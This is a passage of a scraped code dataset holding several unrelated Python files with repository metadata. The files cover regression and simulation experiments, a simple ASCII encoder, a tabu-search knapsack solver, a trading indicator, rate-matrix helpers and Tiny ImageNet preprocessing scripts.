print(\"{:.2f}\".format( fs_y ))\n \n \n \n ","repo_name":"VinhMaiVy/learning-python","sub_path":"src/10 days of stats/s10_multiple_linear_regression.py","file_name":"s10_multiple_linear_regression.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"10960661712","text":"import numpy as np\r\nimport sim\r\nimport math as ma\r\n\r\nn = 500\r\nnval = 100\r\np = 100\r\ns = 50\r\nrho = [0.1, 0.4, 0.7]\r\nsnr = np.logspace(ma.log10(0.05), ma.log10(10), num=12, base=10)\r\nbetatype = [1, 2, 3, 4]\r\nmethod = ['susie', 'Lassocv', 'step']\r\nparameters = ['risk', 'test_err', 'nzs', 'prop']\r\nseed = 0\r\nnrep = 20\r\nL = 50\r\n\r\n\r\ndata = np.zeros((len(method), len(rho), len(betatype), len(snr), len(parameters)))\r\n\r\n\r\nfor j in range(len(rho)):\r\n for k in range(len(betatype)):\r\n for l in range(len(snr)):\r\n print(l)\r\n fit = sim.sim(n=n, nval=nval, p=p, s=s, rho=rho[j], snr=snr[l], beta_type=betatype[k], nrep=nrep, l=L)\r\n for i in range(len(method)):\r\n output, std = fit.sim_method(method[i], seed=seed)\r\n for m in range(len(parameters)):\r\n data[i, j, k, l, m] = output[parameters[m]]\r\n\r\nnp.savez('data_new4.npz', data=data, snr=snr, rho=rho, betatype=betatype, method=method, parameters=parameters)\r\n","repo_name":"whitegugus/Susie","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34887576952","text":"# Learn more about ASCII coding. Make a scrypt creating simple coded message, each letter save as ASCII number.\n# Get familiar with ord() and chr() methods. Remember to add separator.\n# Write second script, which decrypt Your massage.\ndef main():\n \"\"\"Main function of the script.\"\"\"\n print(f'Welcome')\n print(f'This is a short massage encrypter.')\n input(f'Press enter to continue...')\n menu()\n\n\ndef menu():\n \"\"\"This function gives option to save coded massage into a specific file\"\"\"\n user_decision = []\n user_options = ['y', 'n']\n while user_decision not in user_options:\n user_decision = input(f'Do You want to save Your massage into specific or standard file? 
[Y/N]-> ').lower()\n if user_decision == 'y':\n user_filename = input(f'Type the name of Your file -> ')\n else:\n massage_output(input_massage(), 'coded')\n return\n return massage_output(input_massage(), user_filename)\n\n\ndef input_massage():\n \"\"\"Take a massage from User to be encoded and encode it.\"\"\"\n massage = input(f'Type Your massage to be encoded ->')\n coded_massage = []\n for i in range(len(massage)):\n coded_massage.append(ord(massage[i]))\n coded_string = ''\n for i in range(len(coded_massage)):\n coded_string += str(coded_massage[i]) + \",\"\n return coded_string\n\n\ndef massage_output(coded_string, filename):\n \"\"\"Save coded massage to the txt file.\"\"\"\n with open(f'./{filename}.txt', '+w') as file:\n file.write(str(coded_string))\n print(f'The massage was encrypted and saved in a file named {filename}.txt')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Adam-Kolowrocki/New_beginning","sub_path":"07_file_operations/files_09_coder.py","file_name":"files_09_coder.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29689479985","text":"from heapq import heappop,heappush,heapify\n\ndef solution(n, works):\n # 원소 부호를 반대로 work 리스트로 만들어주고\n work = [-i for i in works]\n # heapify로 리스트를 heap구조로 만들어준다\n heapify(work)\n \n # n번 빼야하므로 n번 반복\n for _ in range(n):\n # 첫 원소를 빼서 1을 더한걸 heappush로 넣어준다.\n heappush(work,heappop(work)+1)\n # 만약 가장 큰 원소가 양수라면(실제 음수)\n if work[-1]>0:\n # 0 반환\n return 0\n \n # 전체 원소의 제곱의 합을 반환\n return sum(i**2 for i in work)\n","repo_name":"SonJinHYo/CodingTest","sub_path":"프로그래머스/lv3/12927. 야근 지수/야근 지수.py","file_name":"야근 지수.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11310821636","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 6 11:30:09 2020\n\n@author: harsh\n\"\"\"\n\nimport backtrader as bt\nimport backtrader.indicators as btind\n\nfrom spe.cust_ind import RSC\n\nclass rscu(bt.Indicator):\n '''\n '''\n\n lines = ('hrscu','lrscu','hrscd','lrscd')\n params = (\n ('rscma_period',10),\n )\n plotlines=dict(\n hrscu=dict(color='green'),\n lrscu=dict(color='green'),\n hrscd=dict(color='red'),\n lrscd=dict(color='red')\n )\n \n def log(self, txt, dt=None):\n ''' Logging function fot this strategy'''\n dt = dt or self.data.datetime[0]\n if isinstance(dt, float):\n dt = bt.num2date(dt)\n print('%s, %s' % (dt.isoformat(), txt))\n \n def __init__(self):\n \n self.rsc = RSC.rsc(self.data0,self.data1,subplot=True)\n \n self.rscma = btind.SMA(self.rsc,period=self.p.rscma_period,subplot=True)\n \n self.rsccu_cond = btind.crossover.CrossUp(self.rsc, self.rscma)\n self.rsccd_cond = btind.crossover.CrossDown(self.rsc, self.rscma)\n\n # self.plotlines.hrscu._plotskip = True\n self.plotlines.lrscu._plotskip = True\n self.plotlines.hrscd._plotskip = True\n # self.plotlines.lrscd._plotskip = True\n \n def next(self):\n \n self.lines.hrscu[0] = self.lines.hrscu[-1]\n self.lines.lrscu[0] = self.lines.lrscu[-1]\n self.lines.hrscd[0] = self.lines.hrscd[-1]\n self.lines.lrscd[0] = self.lines.lrscd[-1] \n \n if self.rsccu_cond :\n # self.log(f'Cross Up condition met, High Value {self.data0.high[0]}')\n self.lines.hrscu[0] = self.data0.high[0]\n self.lines.lrscu[0] = self.data0.low[0] \n \n if self.rsccd_cond :\n # self.log(f'Cross Down condition met, High Value {self.data0.high[0]}')\n self.lines.hrscd[0] = self.data0.high[0]\n 
self.lines.lrscd[0] = self.data0.low[0]\n","repo_name":"iamclearmind/webAppBackend","sub_path":"spe/cust_ind/rscu.py","file_name":"rscu.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"22242529865","text":"# Tabu search to solve the knapsack problem\r\n\r\n\r\nimport random\r\n\r\n\r\n\"\"\"\r\nknapsack configuration:\r\nfor each sublist, the first element is the weight\r\nand the second element is the benefit\r\n\"\"\"\r\n\r\n\r\ndef obter_avaliacao(melhor_solucao, mochila, capacidade_maxima):\r\n    somatorio_peso, somatorio_beneficio = 0, 0\r\n\r\n    for i in range(len(melhor_solucao)):\r\n        somatorio_peso += melhor_solucao[i] * mochila[i][0]\r\n        somatorio_beneficio += melhor_solucao[i] * mochila[i][1]\r\n    avaliacao = somatorio_beneficio * (1 - max(0, somatorio_peso - capacidade_maxima))\r\n\r\n    return avaliacao\r\n\r\n\r\ndef obter_peso(solucao, mochila):\r\n    peso = 0\r\n    for i in range(len(solucao)):\r\n        peso += solucao[i] * mochila[i][0]\r\n    return peso\r\n\r\n\r\ndef gerar_vizinhos(melhor_solucao, max_vizinhos):\r\n    vizinhos = []\r\n    pos = 0\r\n    for i in range(max_vizinhos):\r\n        vizinho = []\r\n        for j in range(len(melhor_solucao)):\r\n            if j == pos:\r\n                if melhor_solucao[j] == 0:\r\n                    vizinho.append(1)\r\n                else:\r\n                    vizinho.append(0)\r\n            else:\r\n                vizinho.append(melhor_solucao[j])\r\n        vizinhos.append(vizinho)\r\n        pos += 1\r\n    return vizinhos\r\n\r\n\r\ndef obter_avaliacao_vizinhos(vizinhos, mochila, capacidade_maxima, max_vizinhos):\r\n    vizinhos_avaliacao = []\r\n    for i in range(max_vizinhos):\r\n        vizinhos_avaliacao.append(obter_avaliacao(vizinhos[i], mochila, capacidade_maxima))\r\n    return vizinhos_avaliacao\r\n\r\n\r\ndef obter_bit_modificado(melhor_solucao, melhor_vizinho):\r\n    for i in range(len(melhor_solucao)):\r\n        if melhor_solucao[i] != melhor_vizinho[i]:\r\n            return i\r\n\r\n\r\ndef obter_vizinho_melhor_avaliacao(vizinhos_avaliacao, lista_tabu, melhor_solucao, vizinhos):\r\n    maxima_avaliacao = max(vizinhos_avaliacao)\r\n    pos = 0\r\n    bit_proibido = -1\r\n\r\n    if len(lista_tabu) != 0:\r\n        bit_proibido = lista_tabu[0]\r\n\r\n    for i in range(len(vizinhos_avaliacao)):\r\n        if vizinhos_avaliacao[i] == maxima_avaliacao:\r\n            pos = i\r\n            break\r\n\r\n    if bit_proibido != -1:\r\n        bit_pos = obter_bit_modificado(melhor_solucao, vizinhos[pos])\r\n\r\n        if bit_pos == bit_proibido:\r\n            melhor_pos = 0\r\n            for i in range(len(vizinhos_avaliacao)):\r\n                if i != bit_pos:\r\n                    if vizinhos_avaliacao[i] > vizinhos_avaliacao[melhor_pos]:\r\n                        melhor_pos = i\r\n            return melhor_pos\r\n\r\n    return pos\r\n\r\n\r\nmochila = [[4, 2], [5, 2], [7, 3], [9, 4], [6, 4]]\r\n\r\niteracao, melhor_iteracao = 0, 0\r\nmelhor_solucao = []  # stores the best solution\r\nlista_tabu = []  # tabu list\r\ncapacidade_maxima = 23  # maximum knapsack capacity\r\nbt_max = 1  # maximum number of iterations without improving the best solution\r\nmax_vizinho = 5  # maximum number of neighbors\r\n\r\nfor i in range(len(mochila)):\r\n    bit = random.randint(0, 1)\r\n    melhor_solucao.append(bit)\r\n\r\nprint('Initial solution: {0}, Evaluation: {1}'.format(melhor_solucao,\r\n                                                      obter_avaliacao(melhor_solucao, mochila, capacidade_maxima)))\r\npeso_corrente = obter_peso(melhor_solucao, mochila)\r\nmelhor_avaliacao = obter_avaliacao(melhor_solucao, mochila, capacidade_maxima)\r\nvizinhos = gerar_vizinhos(melhor_solucao, max_vizinho)\r\nprint('vizinhos', vizinhos)\r\nvizinhos_avaliacao = obter_avaliacao_vizinhos(vizinhos, mochila, capacidade_maxima, max_vizinho)\r\npos_melhor_vizinho = obter_vizinho_melhor_avaliacao(vizinhos_avaliacao, lista_tabu, melhor_solucao, vizinhos)\r\n\r\nif vizinhos_avaliacao[pos_melhor_vizinho] > melhor_avaliacao:\r\n    bit_modificado = obter_bit_modificado(melhor_solucao, vizinhos[pos_melhor_vizinho])\r\n    lista_tabu.append(bit_modificado)\r\n    melhor_solucao = vizinhos[pos_melhor_vizinho][:]\r\n    melhor_iteracao += 1\r\n\r\niteracao += 1\r\n\r\nwhile (iteracao - melhor_iteracao) < bt_max:\r\n    \"\"\"\r\n    The stopping condition is met when the difference between the current\r\n    iteration and the best iteration reaches bt_max. iteracao is the global\r\n    iteration counter (always incremented). melhor_iteracao is the iteration\r\n    where the best solution was found (not always incremented). bt_max is the\r\n    maximum number of iterations without improvement of the best solution.\r\n    \"\"\"\r\n    print('vizinhos', vizinhos)\r\n    vizinhos = gerar_vizinhos(melhor_solucao, max_vizinho)[:]\r\n    vizinhos_avaliacao = obter_avaliacao_vizinhos(vizinhos, mochila, capacidade_maxima, max_vizinho)[:]\r\n    pos_melhor_vizinho = obter_vizinho_melhor_avaliacao(vizinhos_avaliacao, lista_tabu, melhor_solucao, vizinhos)\r\n\r\n    if vizinhos_avaliacao[pos_melhor_vizinho] > melhor_avaliacao:\r\n        bit_modificado = obter_bit_modificado(melhor_solucao, vizinhos[pos_melhor_vizinho])\r\n        lista_tabu[0] = bit_modificado\r\n        melhor_solucao = vizinhos[pos_melhor_vizinho][:]\r\n        melhor_avaliacao = vizinhos_avaliacao[pos_melhor_vizinho]\r\n        melhor_iteracao += 1\r\n\r\n    iteracao += 1\r\n\r\nprint('Final solution: {0}, Evaluation: {1}'.format(melhor_solucao,\r\n                                                    obter_avaliacao(melhor_solucao, mochila, capacidade_maxima)))\r\nprint('Best iteration: {0}'.format(melhor_iteracao))\r\nprint('Iteration: {0}'.format(iteracao))\r\n","repo_name":"thcborges/estrutura-de-dados-com-python3","sub_path":"Algoritmos_e_Estrutura_de_Dados/tabu_mochila.py","file_name":"tabu_mochila.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
+{"seq_id":"2110007505","text":"\"\"\"\nHelper functions for analytically computing expectations.\n\nThese helper functions are for the dense compound process,\nand this module is not necessary for Rao-Teh sampling\nor for the analysis of the track histories sampled using Rao-Teh\nstochastic mapping.\n\nThis module should possibly be moved elsewhere.\nThe nxblink package is focused on analysis of sparse matrices\nusing networkx structures and algorithms, whereas a more appropriate package\nfor this module would use numpy and scipy structures and algorithms\nto analyze dense rate matrices, transition matrices, and distributions.\n\nThis module does not need to care about piecewise homogeneity of the process.\n\n\"\"\"\nfrom __future__ import division, print_function, absolute_import\n\nfrom itertools import product\nfrom collections import namedtuple\n\nimport networkx as nx\nimport numpy as np\nimport scipy.linalg\n\nfrom .util import hamming_distance\nfrom .compound import State, compound_state_is_ok\n\n\n__all__ = [\n    'get_compound_states',\n    'define_compound_process', 'get_expected_rate', 'nx_to_np',\n    'nx_to_np_rate_matrix', 'np_to_nx_transition_matrix',\n    'compute_edge_expectation', 'compute_dwell_times',\n    ]\n\n\ndef get_compound_states():\n    \"\"\"\n    Helper function for dense rate matrices.\n\n    Note that some of the compound states in this list may be infeasible.\n\n    \"\"\"\n    nprimary = 6\n\n    # Define the name and state space of each subprocess.\n    track_names = State._fields\n    track_states = (\n        range(nprimary),\n        (0, 1),\n        (0, 1),\n        (0, 1),\n        )\n\n    # The compound state space is the cartesian product\n    # of subprocess state spaces.\n    compound_states = [State(*x) for x in product(*track_states)]\n\n    # Return the ordered compound states.\n    return compound_states\n\n\ndef 
define_compound_process(Q_primary, compound_states, primary_to_tol):\n \"\"\"\n Compute indicator matrices for the compound process.\n\n \"\"\"\n n = len(compound_states)\n\n # define some dense indicator matrices\n I_syn = np.zeros((n, n), dtype=float)\n I_non = np.zeros((n, n), dtype=float)\n I_on = np.zeros((n, n), dtype=float)\n I_off = np.zeros((n, n), dtype=float)\n\n for i, sa in enumerate(compound_states):\n\n # skip compound states that have zero probability\n if not compound_state_is_ok(primary_to_tol, sa):\n continue\n\n for j, sb in enumerate(compound_states):\n\n # skip compound states that have zero probability\n if not compound_state_is_ok(primary_to_tol, sb):\n continue\n\n # if hamming distance between compound states is not 1 then skip\n if hamming_distance(sa, sb) != 1:\n continue\n\n # if a primary transition is not allowed then skip\n if sa.P != sb.P and not Q_primary.has_edge(sa.P, sb.P):\n continue\n\n # set the indicator according to the transition type\n if sa.P != sb.P:\n if primary_to_tol[sa.P] == primary_to_tol[sb.P]:\n I_syn[i, j] = 1\n else:\n I_non[i, j] = 1\n else:\n diff = sum(sb) - sum(sa)\n if diff == 1:\n I_on[i, j] = 1\n elif diff == -1:\n I_off[i, j] = 1\n else:\n raise Exception\n\n return I_syn, I_non, I_on, I_off\n\n\ndef get_expected_rate(Q_dense, dense_distn):\n return -np.dot(np.diag(Q_dense), dense_distn)\n\n\ndef nx_to_np(M_nx, ordered_states):\n state_to_idx = dict((s, i) for i, s in enumerate(ordered_states))\n nstates = len(ordered_states)\n M_np = np.zeros((nstates, nstates))\n for sa, sb in M_nx.edges():\n i = state_to_idx[sa]\n j = state_to_idx[sb]\n M_np[i, j] = M_nx[sa][sb]['weight']\n return M_np\n\n\ndef nx_to_np_rate_matrix(Q_nx, ordered_states):\n Q_np = nx_to_np(Q_nx, ordered_states)\n row_sums = np.sum(Q_np, axis=1)\n Q_np = Q_np - np.diag(row_sums)\n return Q_np\n\n\ndef np_to_nx_transition_matrix(P_np, ordered_states):\n P_nx = nx.DiGraph()\n for i, sa in enumerate(ordered_states):\n for j, sb in enumerate(ordered_states):\n p = P_np[i, j]\n if p:\n P_nx.add_edge(sa, sb, weight=p)\n return P_nx\n\n\ndef compute_edge_expectation(Q, P, J, indicator, t):\n # Q is the rate matrix\n # P is the conditional transition matrix\n # J is the joint distribution matrix\n ncompound = Q.shape[0]\n E = Q * indicator\n interact = scipy.linalg.expm_frechet(Q*t, E*t, compute_expm=False)\n total = 0\n for i in range(ncompound):\n for j in range(ncompound):\n if J[i, j]:\n total += J[i, j] * interact[i, j] / P[i, j]\n return total\n\n\ndef compute_dwell_times(Q, P, J, indicator, t):\n # Q is the rate matrix\n # P is the conditional transition matrix\n # J is the joint distribution matrix\n # the indicator is a dense 1d vector\n ncompound = Q.shape[0]\n E = np.diag(indicator)\n interact = scipy.linalg.expm_frechet(Q*t, E*t, compute_expm=False)\n total = 0\n for i in range(ncompound):\n for j in range(ncompound):\n if J[i, j]:\n total += J[i, j] * interact[i, j] / P[i, j]\n return total\n\n\n","repo_name":"argriffing/nxblink","sub_path":"nxblink/denseutil.py","file_name":"denseutil.py","file_ext":"py","file_size_in_byte":5312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"35068444484","text":"import brax\nfrom brax.io import file\nfrom google.protobuf import text_format\nimport numpy as np\n\n\ndef get_config(config_name: str):\n config_path = f\"./procedural_envs/components/unimal_configs/{config_name}.txt\"\n with file.File(config_path) as f:\n _SYSTEM_CONFIG = f.read()\n f.close()\n 
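# the config is returned as raw text; callers such as get_end_effectors below parse it with text_format.Parse\n    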
return _SYSTEM_CONFIG\n\n\n# detect end effectors\ndef get_end_effectors(config_name: str):\n config_path = f\"./procedural_envs/components/unimal_configs/{config_name}.txt\"\n with file.File(config_path) as f:\n _SYSTEM_CONFIG = f.read()\n f.close()\n config = text_format.Parse(_SYSTEM_CONFIG, brax.Config())\n collides = set([b.name for b in config.bodies])\n parents = set()\n for j in config.joints:\n parents.add(j.parent)\n end_effectors = list(collides - parents)\n return end_effectors\n\n\n# get all bodies\ndef get_all_bodies(config_name: str):\n config_path = f\"./procedural_envs/components/unimal_configs/{config_name}.txt\"\n with file.File(config_path) as f:\n _SYSTEM_CONFIG = f.read()\n f.close()\n config = text_format.Parse(_SYSTEM_CONFIG, brax.Config())\n collides = [b.name for b in config.bodies]\n return collides\n\n\ndef get_agent_names():\n a = np.loadtxt(\"./procedural_envs/components/unimal_configs/agent_list.csv\", delimiter=',', skiprows=1, dtype='str', usecols=[3])\n return a.tolist()\n","repo_name":"frt03/mxt_bench","sub_path":"mxt_bench/procedural_envs/misc/unimal_utils.py","file_name":"unimal_utils.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"23109054181","text":"import pickle\nimport os\n\nimport numpy as np\n\nif __name__ == '__main__' or __name__ == 'keras_util':\n import image_util\n import constants as c\nelse:\n from . import image_util\n from . import constants as c\n\nimport tensorflow as tf\n\n\n################################################################################\n# stores paths to tiny-imagenet files as pickled arrays. These arrays\n# are expected as input 'data_paths' in the DataGenerator above\n\n\ndef is_grey_image(fn):\n img = image_util.read_image(fn)\n return img.shape == (64, 64)\n\n\ndef generate_data_paths_and_pickle():\n '''\n Create a list of the path to the images for the training set, validation set and test set\n '''\n\n image_extension = \".JPEG\"\n\n # Training set\n rootdir = \"../data/tiny-imagenet-200/train\"\n train_ids = []\n\n for subdirs, dirs, files in os.walk(rootdir):\n for file in files:\n path = os.path.join(subdirs, file).replace('\\\\', '/')\n if os.path.splitext(file)[1] == image_extension and \\\n not is_grey_image(path):\n train_ids.append(path)\n\n with open('./saved_objects/train_ids.pickle', 'wb') as fp:\n pickle.dump(train_ids, fp)\n print('There are', len(train_ids), 'samples in trainng')\n\n print(\"created training id's\")\n\n # validation set\n rootdir = \"../data/tiny-imagenet-200/val\"\n validation_ids = []\n for subdirs, dirs, files in os.walk(rootdir):\n for file in files:\n path = os.path.join(subdirs, file).replace('\\\\', '/')\n if os.path.splitext(file)[1] == image_extension and \\\n not is_grey_image(path):\n validation_ids.append(path)\n\n with open('./saved_objects/validation_ids.pickle', 'wb') as fp:\n pickle.dump(validation_ids, fp)\n\n print(\"created validation id's\")\n\n # Test set\n rootdir = \"../data/tiny-imagenet-200/test\"\n\n test_ids = []\n for subdirs, dirs, files in os.walk(rootdir):\n for file in files:\n path = os.path.join(subdirs, file).replace('\\\\', '/')\n if os.path.splitext(file)[1] == image_extension and \\\n not is_grey_image(path):\n test_ids.append(path)\n\n with open('./saved_objects/test_ids.pickle', 'wb') as fp:\n pickle.dump(test_ids, fp)\n\n print(\"created test 
id's\")\n\n\n################################################################################\n# Create soft_encode\n# Aiming to accelerate training\n#\n\nlab_bin_centers = c.lab_bin_centers\n\n\ndef load_keys():\n '''\n This function loads the file keeping track of the labels of the image\n key - > numerical value of the file (also the name of the folder they are in)\n value - > text value of the file\n '''\n label_path = \"../data/tiny-imagenet-200/words.txt\"\n keys = {}\n with open(label_path) as f:\n for line in f:\n key, val = line.split('\\t')\n keys[key] = val\n return keys\n\n\ndef load_validation_keys():\n '''\n This function loads the file keeping track of the labels of the image\n key - > numerical value of the file (also the name of the folder they are in)\n value - > text value of the file\n '''\n label_path = \"../data/tiny-imagenet-200/val/val_annotations.txt\"\n keys = {}\n with open(label_path) as f:\n for line in f:\n key, val, _, _, _, _ = line.split('\\t')\n keys[key] = val\n return keys\n\n\ndef get_available_classes():\n file_counter = 0\n labels = load_keys()\n train_path = \"../data/tiny-imagenet-200/train\"\n counter_gray = 0\n\n for subdirs, dirs, files in os.walk(train_path):\n if len(files) == 500:\n file_counter += 1\n\n label = files[0][:9]\n label_name = labels[label]\n print(file_counter, ': ', label_name, '->', label)\n\n\ndef get_tinytiny_dataset():\n tiny_classes = [\n 'n01443537', 'n01910747', 'n01917289', 'n01950731', 'n02074367', 'n09256479', 'n02321529',\n 'n01855672', 'n02002724', 'n02056570', 'n02058221', 'n02085620', 'n02094433', 'n02099601', 'n02099712',\n 'n02106662', 'n02113799', 'n02123045', 'n02123394', 'n02124075', 'n02125311', 'n02129165', 'n02132136',\n 'n02480495', 'n02481823', 'n12267677', 'n01983481', 'n01984695', 'n02802426', 'n01641577'\n ]\n\n image_extension = \".JPEG\"\n\n # Training set\n rootdir = \"../data/tiny-imagenet-200/train\"\n train_ids = []\n for subdirs, dirs, files in os.walk(rootdir):\n if len(files) == 500 and files[0][:9] in tiny_classes:\n for file in files:\n path = os.path.join(subdirs, file).replace('\\\\', '/')\n if os.path.splitext(file)[1] == image_extension and \\\n not is_grey_image(path):\n train_ids.append(path)\n with open('./train_ids_tiny.pickle', 'wb') as fp:\n pickle.dump(train_ids, fp)\n\n print(\"created training id's\")\n\n # # validation set\n rootdir = \"../data/tiny-imagenet-200/val\"\n valkeys = load_validation_keys()\n validation_ids = []\n print('test')\n for subdirs, dirs, files in os.walk(rootdir):\n for file in files:\n if os.path.splitext(file)[1] == image_extension and valkeys[file] in tiny_classes:\n # print(file)\n path = os.path.join(subdirs, file).replace('\\\\', '/')\n if os.path.splitext(file)[1] == image_extension and \\\n not is_grey_image(path):\n validation_ids.append(path)\n\n with open('./validation_ids_tiny.pickle', 'wb') as fp:\n pickle.dump(validation_ids, fp)\n\n print(\"created validation id's\")\n #\n # # Test set -> Isn't annotated should still do ?\n rootdir = \"../data/tiny-imagenet-200/test\"\n\n test_ids = []\n for subdirs, dirs, files in os.walk(rootdir):\n for file in files:\n path = os.path.join(subdirs, file).replace('\\\\', '/')\n if os.path.splitext(file)[1] == image_extension and \\\n not is_grey_image(path):\n test_ids.append(path)\n #\n with open('./test_ids_tiny.pickle', 'wb') as fp:\n pickle.dump(test_ids, fp)\n #\n print(\"created test id's\")\n\n\ndef save_soft_encode(path):\n image = image_util.read_image(path)\n lab = 
image_util.convert_rgb_to_lab(image)\n    se = image_util.soft_encode_lab_img(lab)\n    new_path = '../data/soft_encoded/' + path[-16:-5] + '_soft_encoded.npz'\n    np.savez_compressed(new_path, se)\n    return new_path\n\n\ndef save_softencode_ondisk():\n    # with open('./done_train_ids_tiny.pickle', 'rb') as fp:\n    #     done = pickle.load(fp)\n    #\n    # with open('../train_ids_soft_encoded.pickle', 'rb') as fp:\n    #     train_paths = pickle.load(fp)\n    # i = 0\n    # with open('./train_ids_tiny.pickle', 'rb') as fp:\n    #     train_ids = pickle.load(fp)\n    # print('There are currently', len(train_ids), 'images in the training set')\n    # for path in train_ids:\n    #     if i % 1000 == 0:\n    #         print('Saved ', i, 'documents')\n    #     namepath = path[49:-5]\n    #     if namepath not in done:\n    #         new_path = save_soft_encode(path, namepath)\n    #         train_paths.append(new_path)\n    #     i += 1\n\n    # with open('../train_ids_soft_encoded.pickle', 'wb') as fp:\n    #     pickle.dump(train_paths, fp)\n    # print('Soft encoded training done')\n\n    validation_paths = []\n    # i = 0\n    # with open('./validation_ids_tiny.pickle', 'rb') as fp:\n    #     validation_ids = pickle.load(fp)\n    # print('There are currently', len(validation_ids), 'images in the validation set')\n    # for path in validation_ids:\n    #     if i % 1000 == 0:\n    #         print('Saved', i, 'documents')\n    #     i+=1\n    #     namepath = path[37:-5]\n    #     new_path = save_soft_encode(path, namepath)\n    #     validation_ids.append(new_path)\n\n    # with open('../validation_ids_soft_encoded.pickle', 'wb') as fp:\n    #     pickle.dump(validation_paths, fp)\n    # print('Soft encoded validation ids done!')\n    #\n    test_paths = []\n    i = 0\n    with open('./test_ids_tiny.pickle', 'rb') as fp:\n        test_ids = pickle.load(fp)\n    print('There are currently', len(test_ids), 'images in the test set')\n    for path in test_ids:\n        if i % 1000 == 0:\n            print('Saved', i, 'documents')\n        i += 1\n        new_path = save_soft_encode(path)\n        test_paths.append(new_path)\n\n    with open('../test_ids_soft_encoded.pickle', 'wb') as fp:\n        pickle.dump(test_paths, fp)\n\n    print('Soft encoded test done!')\n\n\ndef count_number_of_images():\n    with open('../train_ids_soft_encoded.pickle', 'rb') as fp:\n        train_paths = pickle.load(fp)\n    print(\"Number of training images: \", len(train_paths))\n\n    with open('../validation_ids_soft_encoded.pickle', 'rb') as fp:\n        validation_paths = pickle.load(fp)\n    print(\"Number of validation images: \", len(validation_paths))\n\n    with open('../test_ids_soft_encoded.pickle', 'rb') as fp:\n        test_paths = pickle.load(fp)\n    print(\"Number of test images: \", len(test_paths))\n\n################################################################################\n# Create compressed tensor record data\n#\n\ndef create_id_labels():\n    '''\n    Create mappings from label codes to their human-readable names, and to an arbitrary id from 0 to 200\n    :return:\n    '''\n    keys = load_keys()\n    label_path = \"../data/tiny-imagenet-200/wnids.txt\"\n    labels = []\n    with open(label_path) as f:\n        for line in f:\n            labels.append(line.split('\\n')[0])\n\n    id_label = {}\n    label_id = {}\n    label_name = {}\n\n    for i, label in enumerate(labels):\n        name = keys[label]\n        id_label[i] = label\n        label_id[label] = i\n        label_name[label] = name\n        print('Label', label, 'corresponds to', name, 'with class', i)\n\n\ndef wrap_int64(value):\n    '''\n    :param value: an int value\n    :return: the value wrapped in a tfrecord Int64List feature\n    '''\n    return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\ndef wrap_bytes(value):\n    '''\n\n    :param value: a bytes value\n    :return: the value wrapped in a tfrecord BytesList feature\n    '''\n    return 
tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef convert(image_paths, out_path):\n '''\n This functions creates tf record object.\n Inputs are the paths to the rgb pictures. This functions saves\n the different images in their cielab format and in their soft encoded format\n :param image_path: Path to the images to convert into a tfrecord object\n :param out_path: Path where to save the tfrecord object\n :return:\n '''\n\n print(\"Converting: \" + out_path)\n # Number of images. Used when printing the progress.\n num_images = len(image_paths)\n\n # Open a TFRecordWriter for the output-file.\n with tf.python_io.TFRecordWriter(out_path) as writer:\n # Iterate over all the image-paths\n for i, path in enumerate(image_paths):\n if i % 1000 == 0:\n print('Serialised ', i, 'files')\n # Read the images\n rgb = np.array(image_util.read_image(path))\n cie = np.array(image_util.convert_rgb_to_lab(rgb))\n se = np.array(image_util.soft_encode_lab_img(cie))\n\n # Convert them into raw bytes\n cie_bytes = cie.tostring()\n se_bytes = se.tostring()\n\n # Create a dict with the data saved in the record files\n\n data = \\\n {\n 'cie': wrap_bytes(cie_bytes),\n 'label': wrap_bytes(se_bytes)\n }\n\n # Wrap the data as TensorFlow Features.\n feature = tf.train.Features(feature=data)\n\n # Wrap again as a TensorFlow Example.\n example = tf.train.Example(features=feature)\n\n # Serialize the data.\n serialized = example.SerializeToString()\n\n # Write the serialized data to the TFRecords file.\n writer.write(serialized)\n\n\ndef convert_dataset_into_tfrecord():\n training_ids = './saved_objects/train_ids.pickle'\n with open(training_ids, 'rb') as fp:\n training_paths = pickle.load(fp)\n print('There are', len(training_paths), 'samples in the training set')\n training_out = './saved_objects/train_alltiny_tfrecord.tfrecord'\n\n validation_ids = './saved_objects/test_ids.pickle'\n with open(validation_ids, 'rb') as fp:\n validation_paths = pickle.load(fp)\n print('There are', len(validation_paths), 'samples in the validation set')\n validation_out = './saved_objects/validation_alltiny_tfrecord.tfrecord'\n\n convert(training_paths, training_out)\n convert(validation_paths, validation_out)\n\ndef create_all_tf_records():\n # generate_data_paths_and_pickle()\n convert_dataset_into_tfrecord()\n\n\n################################################################################\n# Create compress objects for inputs and outputs\n#\n\n\ndef save_input_output(path, newpath):\n image = image_util.read_image(path)\n lab = image_util.convert_rgb_to_lab(image)\n se = image_util.soft_encode_lab_img(lab)\n\n new_path = newpath\n np.savez_compressed(new_path, input=lab, output=se)\n\n\ndef save_input_output_ondisk():\n # train_paths = []\n # i = 0\n # with open('./train_ids_tiny.pickle', 'rb') as fp:\n # train_ids = pickle.load(fp)\n # print('There are currently', len(train_ids), 'images in the training set')\n # for path in train_ids:\n # if i % 1000 == 0:\n # print('Saved ', i, 'documents')\n # namepath = 'train/' + path[49:-5]\n # new_path = save_input_output(path, namepath)\n # train_paths.append(new_path)\n # i += 1\n #\n # with open('../train_ids_npz.pickle', 'wb') as fp:\n # pickle.dump(train_paths, fp)\n # 